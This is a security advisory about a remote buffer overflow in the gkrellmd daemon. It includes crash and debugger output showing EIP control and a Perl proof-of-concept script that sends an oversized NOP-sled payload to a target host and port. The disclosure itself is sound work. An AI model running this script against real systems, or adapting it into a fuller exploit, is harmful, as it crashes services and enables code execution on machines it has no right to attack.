|
Brought to you by:
Suppliers of:
|
|
|
| |
| GKrellM is a single process stack of system monitors which supports applying themes to match its appearance to your window manager, Gtk, or any other theme. The daemon has been found to contain a security vulnerability that allows remote attackers to cause the daemon to crash, while executing arbitrary code. |
| |
Credit:
The information has been provided by dodo.
|
| |
When someone sends data to the GKrellMd, GKrellMd uses buffers to store this data, however, it doesn't check for the maximum buffersize (128bytes). This can result in remote executing of code and crashing of the daemon.
Example:
Verbose GKrellMd output:
cyride-bash# gkrellmd -P 661 -V
update_HZ=3
connect string from client: gkrellm 2.1.10
gkrellmd accepted client: dwop.darkwired.da.ru:43755
received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
Segmentation fault (core dumped)
Debugger output (eip):
cyride-bash# gdb gkrellmd gkrellmd.core
(gdb) info reg
eip 0x41414141 0x41414141
Vendor status:
The vendor has been contacted on 22-06-2003.
Proof of concept:
gkrellmcrash.pl:
#!/usr/bin/perl -s
use IO::Socket;
#
# proof of concept code
# tested: grkellmd 2.1.10
#
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }
$host = $ARGV[0];
$port = $ARGV[1];
$exploitstring = "\x90"x156;
$eip = "BCDE";
$socket = new IO::Socket::INET (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
sleep(1);
print $socket $exploitstring, $eip;
close($socket);
|
|
|
|
|
